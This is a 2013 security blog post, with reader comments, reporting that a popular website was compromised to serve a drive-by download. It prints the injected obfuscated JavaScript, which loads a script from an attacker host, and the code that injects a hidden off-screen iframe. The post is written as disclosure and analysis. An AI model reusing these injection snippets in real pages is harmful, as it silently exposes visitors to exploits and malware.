Yesterday on, Malware

Nov 12, 13 Yesterday on, Malware

On 2013-11-10 one of our research systems discovered that the website was hosting a drive-by-download that resulted in malware being installed on vulnerable systems that visited the website. As with the compromise that we posted about a few weeks ago, sites that are very popular serving malware can quickly compromise a large number on users. According to Alexa comes in at 650th most popular site in the world, and 289th in the US, meaning thousands of visitors were exposed.

The exploit was served via malicious javascript on

var tyi = “cdm.”; var itwo = “cracked”; var itto = “/”; var phw = “php”; var jfw = “src”; var fscr = “script”; var twi = “i”; var htp = “http”; var vol54 = “src”;document.write(“<“+fscr+” “+jfw+”=”+htp+”:”+itto+””+itto+””+twi+”.”+itwo+””+tyi+”com”+itto+””+twi+”.”+phw+”><“+itto+””+fscr+”>”);

Which sends a request to, a domain registered on 2013-11-04, which means we can assume that those responsible for this had the ability to serve their content from at least that early.

From there an iframe is inserted pointing to

var urla=’’;var divTag=document.createElement(‘div’);’ad3′;document.body.appendChild(divTag);var fr3=document.createElement(‘iframe’);fr3.width=’88px’;fr3.height=’31px’;fr3.setAttribute(‘style’,’position: absolute;left: -8000px;top: 0px;overflow-x: hidden;overflow-y: hidden;’);fr3.setAttribute(‘src’,urla);document.getElementById(‘ad3’).appendChild(fr3);

From there a blend of malicious pdf, java and html/javascript files are sent to the browser and upon success the malware itself is downloaded and installed on the compromised system leaving the user little indication that their system has been compromised except that the java plugin has launched and the system is low on memory.


As of the time of this post the malware is detected by 7 out of the 46 antivirus engines tested by

Further details of the behavior of the malware itself can be seen at

Here is a link to the full pcap (50c691bad0ba43d4370e2be0dd873e83, 4.3M)  for your own further analysis/study. It seems that intentionally or otherwise the attackers employed some techniques to make packet analysis a bit more difficult than usual so be prepared to go a bit beyond your standard methodology.

We attempted to contact with this information, but unfortunately they provide no security contact information on their website, their bounces, and so far they have not responded to messages to their twitter account. So if you know anyone involved in running that site they might appreciate you sharing this post with them.


A few more details about the pcap since we’ve had some questions.

Frame number 66 is the response from (after a redirect). You can see the malicious JS inserted along with their twitter feed, line 1645 if you extract the text response, or search for “paddingLeftFooter twitterLogo” and you’ll find it.

The request to /i.php on begins in frame 1251.

The exploits and the payload are delivered from in multiple requests begining at 1495, 2565, 2567, 2581, and several others. If you’re exploring the easiest way to see this part is to use the ‘http contains “”‘ as your Wireshark filter.

Happy analyzing.

Update 2013-11-14:

One of the site administrators (David Wong) of has posted to their forums that the team fixed the problem Tuesday afternoon. hxxp://

It seems as though the site being compromised and serving malware has been a reoccurring problem with Each with somewhat lax approach “Yeah we stopped getting complaints about it and Google took us off the malware warning list or whatever was triggering it. Is anybody else getting it again?” on their forums. This combined with not alerting their site visitors that know what has happened and remediation steps that they can take to cleanup their systems tends to indicate that should be avoided if you’re concerned with malware.


  1. As a frequent user of, I’m reasonably worried by this. How would one go about containing and eliminating it, if their machine had been infected?

  2. anonymous /

    For the easiest way to notify them is the forums.

  3. i think making a list of the 7 ways i feel most betrayed is in order.

  4. It’s very frustrating and disheartening that every time Java has another security flaw or is used for some deviant purpose, people freak out and disable JavaScript thinking they’re either the same thing, are somehow related, or getting them mixed up. JavaScript is harmless and can really only be used for two purposes: to vastly improve the user experience, or to create annoying popups (that’s about the worst thing it can do). When people disable JS, it makes my job much more difficult because then I have to build multiple versions of every site for a fallback, and it degrades the user experience and makes it so that all of my effort is in vain.

    There needs to be some kind of widespread public service announcement that JavaScript is safe and is not Java!

    • I’ll just toss out all my JS webshells then, clearly they aren’t malicious anymore.

      JavaScript has many unsafe functions, and malicious iframes are not “just annoying”, they are responsible for a ridiculous amount of drive-by downloads and theft of credentials and personal information.

      A simple search for “malicious javascript” brings a wealth of information, but here’s the top hit:

      I can’t REMEMBER the last time I saw a browser-based exploit in the wild that didn’t leverage JavaScript in some way. JS not only can be used to do sketchy shit, but in general, we can READ what’s happening with JavaScript because it runs in our client, not the server, that lets us mess with your code and perform all sorts of lovely little attacks.

      Source: CyberWarrior fighting the APT with the Big Data in The Cloud

    • Matthew /

      Though the payload of an exploit is delivered by Java (or flash / pdf etc.), the fact remains that javscript IS often a vector for setting things up.

      Therefore, limiting availability of JavaScript to trusted sites only (eg. the Noscript plugin) is a positive security step.
      Yes, many sites will break without it, but there is no good reason to add more.

      I would EXPECT any site that isn’t specifically delivering interactivity, to be able to work under “restricted zone” conditions.

    • Sorry, Amit, but you sound terribly misinformed. Try playing around with some Metasploit payloads and BeEF Framework and tell me that JavaScript is harmless.

  5. JavaScript isn’t as safe as you say. I understand the frustration with getting it confused with Java, but as you can see from the article it was used to cause the download of the file that caused this. Not only can it cause annoying popups, but it can also open hidden iframes to malicious URLs (among other things).

    It can be used to do a ton of stuff that the normal user would never know about. So, disabling JavaScript is not necessarily a bad idea. I have it disabled by default for sites I have never been to.

    There are many other tools out there you can use to make your site user-friendly like HTML5 and CSS3 😉

  6. ummm amit… I think that this is a javascript thing on their website…. It is an iFrame that points to another website. SO in this case it is javascript that is the issue, where the bigger issue is how the malware was actually coded into the website.